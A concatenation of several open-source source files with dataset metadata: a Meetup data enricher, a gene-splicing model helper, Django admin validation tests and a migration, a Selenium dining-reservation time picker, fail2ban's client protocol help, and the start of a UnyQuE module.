# Fields which names are translated
map_fields = {
"link": "url",
"rsvp_limit": "rsvps_limit"
}
for fn in map_fields:
if fn in event:
eitem[map_fields[fn]] = event[fn]
else:
eitem[f] = None
# event host fields: author of the event
if 'event_hosts' in event:
host = event['event_hosts'][0]
if 'photo' in host:
eitem['member_photo_url'] = host['photo']['photo_link']
eitem['member_photo_id'] = host['photo']['id']
eitem['member_photo_type'] = host['photo']['type']
eitem['member_is_host'] = True
eitem['member_id'] = host['id']
eitem['member_name'] = host['name']
eitem['member_url'] = "https://www.meetup.com/members/" + str(host['id'])
eitem['event_url'] = event['link']
# data fields to copy with meetup`prefix
copy_fields = ["description", "plain_text_description",
"name", "status", "utc_offset", "visibility",
"waitlist_count", "yes_rsvp_count", "duration",
"featured", "rsvpable"]
copy_fields_time = ["time", "updated", "created"]
for f in copy_fields:
if f in event:
eitem["meetup_" + f] = event[f]
else:
eitem[f] = None
for f in copy_fields_time:
if f in event:
eitem["meetup_" + f] = unixtime_to_datetime(event[f] / 1000).isoformat()
else:
eitem[f] = None
rsvps = event.get('rsvps', [])
eitem['num_rsvps'] = len(rsvps)
eitem['num_comments'] = len(event['comments'])
try:
if 'time' in event:
eitem['time_date'] = unixtime_to_datetime(event['time'] / 1000).isoformat()
else:
logger.warning("time field nof found in event")
return {}
except ValueError:
logger.warning("Wrong datetime for %s: %s", eitem['url'], event['time'])
# If no datetime for the enriched item, it is useless for Kibana
return {}
if 'venue' in event:
venue = event['venue']
copy_fields = ["id", "name", "city", "state", "zip", "country",
"localized_country_name", "repinned", "address_1"]
for f in copy_fields:
if f in venue:
eitem["venue_" + f] = venue[f]
else:
eitem[f] = None
eitem['venue_geolocation'] = {
"lat": event['venue']['lat'],
"lon": event['venue']['lon'],
}
if 'series' in event:
eitem['series_id'] = event['series']['id']
eitem['series_description'] = event['series']['description']
eitem['series_start_date'] = event['series']['start_date']
if 'group' in event:
group = event['group']
copy_fields = ["id", "created", "join_mode", "name", "url_name",
"who"]
for f in copy_fields:
if f in group:
eitem["group_" + f] = group[f]
else:
eitem[f] = None
eitem['group_geolocation'] = {
"lat": group['lat'],
"lon": group['lon'],
}
eitem['group_topics'] = []
eitem['group_topics_keys'] = []
if 'topics' in group:
group_topics = [topic['name'] for topic in group['topics']]
group_topics_keys = [topic['urlkey'] for topic in group['topics']]
eitem['group_topics'] = group_topics
eitem['group_topics_keys'] = group_topics_keys
if len(rsvps) > 0:
eitem['group_members'] = rsvps[0]['group']['members']
created = unixtime_to_datetime(event['created'] / 1000).isoformat()
eitem['type'] = "meetup"
# time_date is when the meetup will take place, the needed one in this index
# created is when the meetup entry was created and it is not the interesting date
eitem.update(self.get_grimoire_fields(eitem['time_date'], eitem['type']))
if self.sortinghat:
eitem.update(self.get_item_sh(event))
if self.prjs_map:
eitem.update(self.get_item_project(eitem))
self.add_repository_labels(eitem)
self.add_metadata_filter_raw(eitem)
return eitem
def get_item_sh(self, item):
""" Add sorting hat enrichment fields """
sh_fields = {}
# Not shared common get_item_sh because it is pretty specific
if 'member' in item:
# comment and rsvp
identity = self.get_sh_identity(item['member'])
elif 'event_hosts' in item:
# meetup event
identity = self.get_sh_identity(item['event_hosts'][0])
else:
return sh_fields
created = unixtime_to_datetime(item['created'] / 1000)
sh_fields = self.get_item_sh_fields(identity, created)
return sh_fields
def get_rich_item_comments(self, comments, eitem):
for comment in comments:
ecomment = copy.deepcopy(eitem)
created = unixtime_to_datetime(comment['created'] / 1000).isoformat()
ecomment['url'] = comment['link']
ecomment['id'] = ecomment['id'] + '_comment_' + str(comment['id'])
ecomment['comment'] = comment['comment']
ecomment['like_count'] = comment['like_count']
ecomment['type'] = 'comment'
ecomment.update(self.get_grimoire_fields(created, ecomment['type']))
ecomment.pop('is_meetup_meetup')
# event host fields: author of the event
member = comment['member']
if 'photo' in member:
ecomment['member_photo_url'] = member['photo']['photo_link']
ecomment['member_photo_id'] = member['photo']['id']
ecomment['member_photo_type'] = member['photo']['type']
if 'event_context' in member:
ecomment['member_is_host'] = member['event_context']['host']
ecomment['member_id'] = member['id']
ecomment['member_name'] = member['name']
ecomment['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
if self.sortinghat:
ecomment.update(self.get_item_sh(comment))
yield ecomment
def get_rich_item_rsvps(self, rsvps, eitem):
for rsvp in rsvps:
ersvp = copy.deepcopy(eitem)
ersvp['type'] = 'rsvp'
created = unixtime_to_datetime(rsvp['created'] / 1000).isoformat()
ersvp.update(self.get_grimoire_fields(created, ersvp['type']))
ersvp.pop('is_meetup_meetup')
# event host fields: author of the event
member = rsvp['member']
if 'photo' in member:
ersvp['member_photo_url'] = member['photo']['photo_link']
ersvp['member_photo_id'] = member['photo']['id']
ersvp['member_photo_type'] = member['photo']['type']
ersvp['member_is_host'] = member['event_context']['host']
ersvp['member_id'] = member['id']
ersvp['member_name'] = member['name']
ersvp['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['id'] = ersvp['id'] + '_rsvp_' + str(rsvp['event']['id']) + "_" + str(member['id'])
ersvp['url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['rsvps_guests'] = rsvp['guests']
ersvp['rsvps_updated'] = rsvp['updated']
ersvp['rsvps_response'] = rsvp['response']
if self.sortinghat:
ersvp.update(self.get_item_sh(rsvp))
yield ersvp
def get_field_unique_id(self):
return "id"
def enrich_items(self, ocean_backend):
items_to_enrich = []
num_items = 0
ins_items = 0
for item in ocean_backend.fetch():
eitem = self.get_rich_item(item)
if 'uuid' not in eitem:
continue
items_to_enrich.append(eitem)
if 'comments' in item['data'] and 'id' in eitem:
comments = item['data']['comments']
rich_item_comments = self.get_rich_item_comments(comments, eitem)
items_to_enrich.extend(rich_item_comments)
if 'rsvps' in item['data'] and 'id' in eitem:
rsvps = item['data']['rsvps']
rich_item_rsvps = self.get_rich_item_rsvps(rsvps, eitem)
items_to_enrich.extend(rich_item_rsvps)
if len(items_to_enrich) < MAX_SIZE_BULK_ENRICHED_ITEMS:
continue
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
items_to_enrich = []
if len(items_to_enrich) > 0:
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
if num_items != ins_items:
missing = num_items - ins_items
logger.error("%s/%s missing items for Meetup", str(missing), str(num_items))
else:
logger.info("%s items inserted for Meetup", str(num_items))
return num_items
|
gpl-3.0
| -4,369,405,093,059,499,000
| 33.660622
| 101
| 0.52545
| false
| 3.831329
| false
| false
| false
|
ratschlab/ASP
|
applications/msplicer/content_sensors.py
|
1
|
2271
|
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Written (W) 2006-2007 Soeren Sonnenburg
# Written (W) 2007 Gunnar Raetsch
# Copyright (C) 2007-2008 Fraunhofer Institute FIRST and Max-Planck-Society
#
import numpy
class content_sensors:
def __init__(self, model):
self.dict_weights_intron=numpy.array(model.dict_weights_intron, dtype=numpy.float64)
self.dict_weights_coding=numpy.array(model.dict_weights_coding, dtype=numpy.float64)
self.dicts=numpy.concatenate((self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron, self.dict_weights_coding,self.dict_weights_intron, self.dict_weights_coding, self.dict_weights_intron), axis=0)
self.dicts[0, 64:] = 0 # only order 3 info
self.dicts[1, 64:] = 0 # only order 3 info
self.dicts[2, 0:64] = 0 # only order 4 info
self.dicts[2, 320:] = 0
self.dicts[3, 0:64] = 0 # only order 4 info
self.dicts[3, 320:] = 0
self.dicts[4, 0:320] = 0 # only order 5 info
self.dicts[4, 1344:] = 0
self.dicts[5, 0:320] = 0 # only order 5 info
self.dicts[5, 1344:] = 0
self.dicts[6, 0:1344] = 0 # only order 6 info
self.dicts[7, 0:1344] = 0 # only order 6 info
self.model = model
def get_dict_weights(self):
return self.dicts.T
def initialize_content(self, dyn):
dyn.init_svm_arrays(len(self.model.word_degree), len(self.model.mod_words))
word_degree = numpy.array(self.model.word_degree, numpy.int32)
dyn.init_word_degree_array(word_degree)
mod_words = numpy.array(4**word_degree, numpy.int32)
dyn.init_num_words_array(mod_words)
cum_mod_words=numpy.zeros(len(mod_words)+1, numpy.int32)
cum_mod_words[1:] = numpy.cumsum(mod_words)
dyn.init_cum_num_words_array(cum_mod_words)
dyn.init_mod_words_array(numpy.array(self.model.mod_words, numpy.int32))
dyn.init_sign_words_array(numpy.array(self.model.sign_words, numpy.bool))
dyn.init_string_words_array(numpy.zeros(len(self.model.sign_words), numpy.int32))
assert(dyn.check_svm_arrays())
|
gpl-2.0
| -2,526,926,866,745,545,700
| 39.553571
| 246
| 0.693087
| false
| 2.821118
| false
| false
| false
|
disqus/django-old
|
tests/regressiontests/admin_validation/tests.py
|
1
|
9982
|
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.contrib import admin
from django.contrib.admin.validation import validate, validate_inline
from models import Song, Book, Album, TwoAlbumFKAndAnE, State, City
class SongForm(forms.ModelForm):
pass
class ValidFields(admin.ModelAdmin):
form = SongForm
fields = ['title']
class InvalidFields(admin.ModelAdmin):
form = SongForm
fields = ['spam']
class ValidationTestCase(TestCase):
def test_readonly_and_editable(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ["original_release"]
fieldsets = [
(None, {
"fields": ["title", "original_release"],
}),
]
validate(SongAdmin, Song)
def test_custom_modelforms_with_fields_fieldsets(self):
"""
# Regression test for #8027: custom ModelForms with fields/fieldsets
"""
validate(ValidFields, Song)
self.assertRaisesMessage(ImproperlyConfigured,
"'InvalidFields.fields' refers to field 'spam' that is missing from the form.",
validate,
InvalidFields, Song)
def test_exclude_values(self):
"""
Tests for basic validation of 'exclude' option values (#12689)
"""
class ExcludedFields1(admin.ModelAdmin):
exclude = ('foo')
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFields1.exclude' must be a list or tuple.",
validate,
ExcludedFields1, Book)
def test_exclude_duplicate_values(self):
class ExcludedFields2(admin.ModelAdmin):
exclude = ('name', 'name')
self.assertRaisesMessage(ImproperlyConfigured,
"There are duplicate field(s) in ExcludedFields2.exclude",
validate,
ExcludedFields2, Book)
def test_exclude_in_inline(self):
class ExcludedFieldsInline(admin.TabularInline):
model = Song
exclude = ('foo')
class ExcludedFieldsAlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [ExcludedFieldsInline]
self.assertRaisesMessage(ImproperlyConfigured,
"'ExcludedFieldsInline.exclude' must be a list or tuple.",
validate,
ExcludedFieldsAlbumAdmin, Album)
def test_exclude_inline_model_admin(self):
"""
# Regression test for #9932 - exclude in InlineModelAdmin
# should not contain the ForeignKey field used in ModelAdmin.model
"""
class SongInline(admin.StackedInline):
model = Song
exclude = ['album']
class AlbumAdmin(admin.ModelAdmin):
model = Album
inlines = [SongInline]
self.assertRaisesMessage(ImproperlyConfigured,
"SongInline cannot exclude the field 'album' - this is the foreign key to the parent model admin_validation.Album.",
validate,
AlbumAdmin, Album)
def test_app_label_in_admin_validation(self):
"""
Regression test for #15669 - Include app label in admin validation messages
"""
class RawIdNonexistingAdmin(admin.ModelAdmin):
raw_id_fields = ('nonexisting',)
self.assertRaisesMessage(ImproperlyConfigured,
"'RawIdNonexistingAdmin.raw_id_fields' refers to field 'nonexisting' that is missing from model 'admin_validation.Album'.",
validate,
RawIdNonexistingAdmin, Album)
def test_fk_exclusion(self):
"""
Regression test for #11709 - when testing for fk excluding (when exclude is
given) make sure fk_name is honored or things blow up when there is more
than one fk to the parent model.
"""
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
exclude = ("e",)
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_inline_self_validation(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
self.assertRaisesMessage(Exception,
"<class 'regressiontests.admin_validation.models.TwoAlbumFKAndAnE'> has more than 1 ForeignKey to <class 'regressiontests.admin_validation.models.Album'>",
validate_inline,
TwoAlbumFKAndAnEInline, None, Album)
def test_inline_with_specified(self):
class TwoAlbumFKAndAnEInline(admin.TabularInline):
model = TwoAlbumFKAndAnE
fk_name = "album1"
validate_inline(TwoAlbumFKAndAnEInline, None, Album)
def test_readonly(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title",)
validate(SongAdmin, Song)
def test_readonly_on_method(self):
def my_function(obj):
pass
class SongAdmin(admin.ModelAdmin):
readonly_fields = (my_function,)
validate(SongAdmin, Song)
def test_readonly_on_modeladmin(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_modeladmin",)
def readonly_method_on_modeladmin(self, obj):
pass
validate(SongAdmin, Song)
def test_readonly_method_on_model(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("readonly_method_on_model",)
validate(SongAdmin, Song)
def test_nonexistant_field(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = ("title", "nonexistant")
self.assertRaisesMessage(ImproperlyConfigured,
"SongAdmin.readonly_fields[1], 'nonexistant' is not a callable or an attribute of 'SongAdmin' or found in the model 'Song'.",
validate,
SongAdmin, Song)
def test_nonexistant_field_on_inline(self):
class CityInline(admin.TabularInline):
model = City
readonly_fields=['i_dont_exist'] # Missing attribute
self.assertRaisesMessage(ImproperlyConfigured,
"CityInline.readonly_fields[0], 'i_dont_exist' is not a callable or an attribute of 'CityInline' or found in the model 'City'.",
validate_inline,
CityInline, None, State)
def test_extra(self):
class SongAdmin(admin.ModelAdmin):
def awesome_song(self, instance):
if instance.title == "Born to Run":
return "Best Ever!"
return "Status unknown."
validate(SongAdmin, Song)
def test_readonly_lambda(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = (lambda obj: "test",)
validate(SongAdmin, Song)
def test_graceful_m2m_fail(self):
"""
Regression test for #12203/#12237 - Fail more gracefully when a M2M field that
specifies the 'through' option is included in the 'fields' or the 'fieldsets'
ModelAdmin options.
"""
class BookAdmin(admin.ModelAdmin):
fields = ['authors']
self.assertRaisesMessage(ImproperlyConfigured,
"'BookAdmin.fields' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
BookAdmin, Book)
def test_cannot_include_through(self):
class FieldsetBookAdmin(admin.ModelAdmin):
fieldsets = (
('Header 1', {'fields': ('name',)}),
('Header 2', {'fields': ('authors',)}),
)
self.assertRaisesMessage(ImproperlyConfigured,
"'FieldsetBookAdmin.fieldsets[1][1]['fields']' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
FieldsetBookAdmin, Book)
def test_nested_fields(self):
class NestedFieldsAdmin(admin.ModelAdmin):
fields = ('price', ('name', 'subtitle'))
validate(NestedFieldsAdmin, Book)
def test_nested_fieldsets(self):
class NestedFieldsetAdmin(admin.ModelAdmin):
fieldsets = (
('Main', {'fields': ('price', ('name', 'subtitle'))}),
)
validate(NestedFieldsetAdmin, Book)
def test_explicit_through_override(self):
"""
Regression test for #12209 -- If the explicitly provided through model
is specified as a string, the admin should still be able use
Model.m2m_field.through
"""
class AuthorsInline(admin.TabularInline):
model = Book.authors.through
class BookAdmin(admin.ModelAdmin):
inlines = [AuthorsInline]
# If the through model is still a string (and hasn't been resolved to a model)
# the validation will fail.
validate(BookAdmin, Book)
def test_non_model_fields(self):
"""
Regression for ensuring ModelAdmin.fields can contain non-model fields
that broke with r11737
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['title', 'extra_data']
validate(FieldsOnFormOnlyAdmin, Song)
def test_non_model_first_field(self):
"""
Regression for ensuring ModelAdmin.field can handle first elem being a
non-model field (test fix for UnboundLocalError introduced with r16225).
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['extra_data', 'title']
validate(FieldsOnFormOnlyAdmin, Song)
|
bsd-3-clause
| 1,530,670,665,720,559,000
| 34.523132
| 167
| 0.619415
| false
| 4.482263
| true
| false
| false
|
aestheticblasphemy/aestheticBlasphemy
|
pl_messages/migrations/0002_auto_20200828_2129.py
|
1
|
1972
|
# Generated by Django 3.1 on 2020-08-28 15:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pl_messages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='messages',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='pl_messages.messages'),
),
migrations.AlterField(
model_name='participantnotifications',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notified_participant', to=settings.AUTH_USER_MODEL, verbose_name='Notification Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='thread_participant', to=settings.AUTH_USER_MODEL, verbose_name='Thread Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='threads',
field=models.ManyToManyField(related_name='participant_threads', to='pl_messages.Thread', verbose_name='Participant Threads'),
),
migrations.AlterField(
model_name='thread',
name='last_message',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='last_message_in_thread', to='pl_messages.messages', verbose_name='Last Message'),
),
migrations.AlterField(
model_name='thread',
name='messages',
field=models.ManyToManyField(related_name='thread_messages', to='pl_messages.Messages', verbose_name='Thread Messages'),
),
]
|
gpl-3.0
| 7,672,388,963,139,680,000
| 41.869565
| 188
| 0.647566
| false
| 4.391982
| false
| false
| false
|
dmwyatt/disney.api
|
pages/timepicker.py
|
1
|
3504
|
import datetime
import logging
import os
import time
import re
import webbrowser
from dateutil import parser
from selenium import webdriver
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from selenium.webdriver.support.select import Select
from helpers import roundTime, difference_in_minutes, format_dt
from pages.helpers import wait_for
logger = logging.getLogger(__name__)
class TimeNotBookableError(Exception):
pass
class BasicTimePicker:
select_selector = 'select#diningAvailabilityForm-searchTime'
def __init__(self, browser: webdriver.PhantomJS):
self.browser = browser
@property
def select_element(self):
return self.browser.find_element_by_css_selector(self.select_selector)
@property
def select(self):
return Select(self.select_element)
@property
def option_elements(self):
return self.select_element.find_elements_by_tag_name('option')
@property
def selectable_values(self):
return [x.get_attribute('value') for x in self.option_elements]
@property
def selectable_texts(self):
return [x.text for x in self.option_elements]
def select_exact_time(self, desired_dt: datetime.datetime):
the_time = desired_dt.strftime('%H:%M')
if not the_time in self.selectable_values:
raise TimeNotBookableError("Cannot select '{}' from {}".format(the_time, self.selectable_values))
self.select.select_by_value(the_time)
def select_time_with_leeway(self, desired_dt: datetime.datetime, leeway: int):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
if closest_delta <= leeway:
self.select_exact_time(closest)
else:
raise TimeNotBookableError("There is no selectable time that's "
"less than {} minutes from {} "
"in {}".format(leeway, format_dt(desired_dt), self.selectable_values))
def select_closest_time(self, desired_dt: datetime.datetime):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
self.select_exact_time(closest)
def select_meal(self, meal):
try:
self.select.select_by_visible_text(meal)
except NoSuchElementException:
raise TimeNotBookableError("Cannot select '{}' from {}".format(meal, self.selectable_texts))
def select_breakfast(self):
self.select_meal('Breakfast')
def select_lunch(self):
self.select_meal('Lunch')
def select_dinner(self):
self.select_meal('Dinner')
def time_to_datetime(the_time: str, reference_dt: datetime.datetime) -> datetime.datetime:
"""
Takes a string representing a time and a datetime.datetime that represents the day that time
is on, and returns a datetime.datetime on that day with the new time.
"""
dt = parser.parse(the_time)
return dt.replace(year=reference_dt.year, month=reference_dt.month, day=reference_dt.day)
|
mit
| 4,530,609,695,152,849,400
| 27.958678
| 100
| 0.720034
| false
| 3.250464
| false
| false
| false
|
jakesyl/fail2ban
|
fail2ban/protocol.py
|
1
|
9025
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :
# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Author: Cyril Jaquier
#
__author__ = "Cyril Jaquier"
__copyright__ = "Copyright (c) 2004 Cyril Jaquier"
__license__ = "GPL"
import textwrap
##
# Describes the protocol used to communicate with the server.
protocol = [
['', "BASIC", ""],
["start", "starts the server and the jails"],
["reload", "reloads the configuration"],
["reload <JAIL>", "reloads the jail <JAIL>"],
["stop", "stops all jails and terminate the server"],
["status", "gets the current status of the server"],
["ping", "tests if the server is alive"],
["help", "return this output"],
["version", "return the server version"],
['', "LOGGING", ""],
["set loglevel <LEVEL>", "sets logging level to <LEVEL>. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG"],
["get loglevel", "gets the logging level"],
["set logtarget <TARGET>", "sets logging target to <TARGET>. Can be STDOUT, STDERR, SYSLOG or a file"],
["get logtarget", "gets logging target"],
["flushlogs", "flushes the logtarget if a file and reopens it. For log rotation."],
['', "DATABASE", ""],
["set dbfile <FILE>", "set the location of fail2ban persistent datastore. Set to \"None\" to disable"],
["get dbfile", "get the location of fail2ban persistent datastore"],
["set dbpurgeage <SECONDS>", "sets the max age in <SECONDS> that history of bans will be kept"],
["get dbpurgeage", "gets the max age in seconds that history of bans will be kept"],
['', "JAIL CONTROL", ""],
["add <JAIL> <BACKEND>", "creates <JAIL> using <BACKEND>"],
["start <JAIL>", "starts the jail <JAIL>"],
["stop <JAIL>", "stops the jail <JAIL>. The jail is removed"],
["status <JAIL> [FLAVOR]", "gets the current status of <JAIL>, with optional flavor or extended info"],
['', "JAIL CONFIGURATION", ""],
["set <JAIL> idle on|off", "sets the idle state of <JAIL>"],
["set <JAIL> addignoreip <IP>", "adds <IP> to the ignore list of <JAIL>"],
["set <JAIL> delignoreip <IP>", "removes <IP> from the ignore list of <JAIL>"],
["set <JAIL> addlogpath <FILE> ['tail']", "adds <FILE> to the monitoring list of <JAIL>, optionally starting at the 'tail' of the file (default 'head')."],
["set <JAIL> dellogpath <FILE>", "removes <FILE> from the monitoring list of <JAIL>"],
["set <JAIL> logencoding <ENCODING>", "sets the <ENCODING> of the log files for <JAIL>"],
["set <JAIL> addjournalmatch <MATCH>", "adds <MATCH> to the journal filter of <JAIL>"],
["set <JAIL> deljournalmatch <MATCH>", "removes <MATCH> from the journal filter of <JAIL>"],
["set <JAIL> addfailregex <REGEX>", "adds the regular expression <REGEX> which must match failures for <JAIL>"],
["set <JAIL> delfailregex <INDEX>", "removes the regular expression at <INDEX> for failregex"],
["set <JAIL> ignorecommand <VALUE>", "sets ignorecommand of <JAIL>"],
["set <JAIL> addignoreregex <REGEX>", "adds the regular expression <REGEX> which should match pattern to exclude for <JAIL>"],
["set <JAIL> delignoreregex <INDEX>", "removes the regular expression at <INDEX> for ignoreregex"],
["set <JAIL> findtime <TIME>", "sets the number of seconds <TIME> for which the filter will look back for <JAIL>"],
["set <JAIL> bantime <TIME>", "sets the number of seconds <TIME> a host will be banned for <JAIL>"],
["set <JAIL> datepattern <PATTERN>", "sets the <PATTERN> used to match date/times for <JAIL>"],
["set <JAIL> usedns <VALUE>", "sets the usedns mode for <JAIL>"],
["set <JAIL> banip <IP>", "manually Ban <IP> for <JAIL>"],
["set <JAIL> unbanip <IP>", "manually Unban <IP> in <JAIL>"],
["set <JAIL> maxretry <RETRY>", "sets the number of failures <RETRY> before banning the host for <JAIL>"],
["set <JAIL> maxlines <LINES>", "sets the number of <LINES> to buffer for regex search for <JAIL>"],
["set <JAIL> addaction <ACT>[ <PYTHONFILE> <JSONKWARGS>]", "adds a new action named <NAME> for <JAIL>. Optionally for a Python based action, a <PYTHONFILE> and <JSONKWARGS> can be specified, else will be a Command Action"],
["set <JAIL> delaction <ACT>", "removes the action <ACT> from <JAIL>"],
["", "COMMAND ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> actionstart <CMD>", "sets the start command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionstop <CMD>", "sets the stop command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actioncheck <CMD>", "sets the check command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionban <CMD>", "sets the ban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionunban <CMD>", "sets the unban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> timeout <TIMEOUT>", "sets <TIMEOUT> as the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> <PROPERTY> <VALUE>", "sets the <VALUE> of <PROPERTY> for the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> <METHOD>[ <JSONKWARGS>]", "calls the <METHOD> with <JSONKWARGS> for the action <ACT> for <JAIL>"],
['', "JAIL INFORMATION", ""],
["get <JAIL> logpath", "gets the list of the monitored files for <JAIL>"],
["get <JAIL> logencoding", "gets the encoding of the log files for <JAIL>"],
["get <JAIL> journalmatch", "gets the journal filter match for <JAIL>"],
["get <JAIL> ignoreip", "gets the list of ignored IP addresses for <JAIL>"],
["get <JAIL> ignorecommand", "gets ignorecommand of <JAIL>"],
["get <JAIL> failregex", "gets the list of regular expressions which matches the failures for <JAIL>"],
["get <JAIL> ignoreregex", "gets the list of regular expressions which matches patterns to ignore for <JAIL>"],
["get <JAIL> findtime", "gets the time for which the filter will look back for failures for <JAIL>"],
["get <JAIL> bantime", "gets the time a host is banned for <JAIL>"],
["get <JAIL> datepattern", "gets the patern used to match date/times for <JAIL>"],
["get <JAIL> usedns", "gets the usedns setting for <JAIL>"],
["get <JAIL> maxretry", "gets the number of failures allowed for <JAIL>"],
["get <JAIL> maxlines", "gets the number of lines to buffer for <JAIL>"],
["get <JAIL> actions", "gets a list of actions for <JAIL>"],
["", "COMMAND ACTION INFORMATION",""],
["get <JAIL> action <ACT> actionstart", "gets the start command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionstop", "gets the stop command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actioncheck", "gets the check command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionban", "gets the ban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionunban", "gets the unban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> timeout", "gets the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION INFORMATION", ""],
["get <JAIL> actionproperties <ACT>", "gets a list of properties for the action <ACT> for <JAIL>"],
["get <JAIL> actionmethods <ACT>", "gets a list of methods for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> <PROPERTY>", "gets the value of <PROPERTY> for the action <ACT> for <JAIL>"],
]
##
# Prints the protocol in a "man" format. This is used for the
# "-h" output of fail2ban-client.
def printFormatted():
INDENT=4
MARGIN=41
WIDTH=34
firstHeading = False
for m in protocol:
if m[0] == '' and firstHeading:
print
firstHeading = True
first = True
if len(m[0]) >= MARGIN:
m[1] = ' ' * WIDTH + m[1]
for n in textwrap.wrap(m[1], WIDTH, drop_whitespace=False):
if first:
line = ' ' * INDENT + m[0] + ' ' * (MARGIN - len(m[0])) + n.strip()
first = False
else:
line = ' ' * (INDENT + MARGIN) + n.strip()
print line
##
# Prints the protocol in a "mediawiki" format.
def printWiki():
firstHeading = False
for m in protocol:
if m[0] == '':
if firstHeading:
print "|}"
__printWikiHeader(m[1], m[2])
firstHeading = True
else:
print "|-"
print "| <span style=\"white-space:nowrap;\"><tt>" + m[0] + "</tt></span> || || " + m[1]
print "|}"
def __printWikiHeader(section, desc):
print
print "=== " + section + " ==="
print
print desc
print
print "{|"
print "| '''Command''' || || '''Description'''"
|
gpl-2.0
| -5,112,870,207,491,845,000
| 53.041916
| 224
| 0.668033
| false
| 3.116367
| false
| false
| false
|
aravindalwan/unyque
|
unyque/rdimension.py
|
1
|
3726
|
'''Representation of a random variable used in stochastic collocation'''
__copyright__ = 'Copyright (C) 2011 Aravind Alwan'
__license__ = '''
This file is part of UnyQuE.
UnyQuE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
UnyQuE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
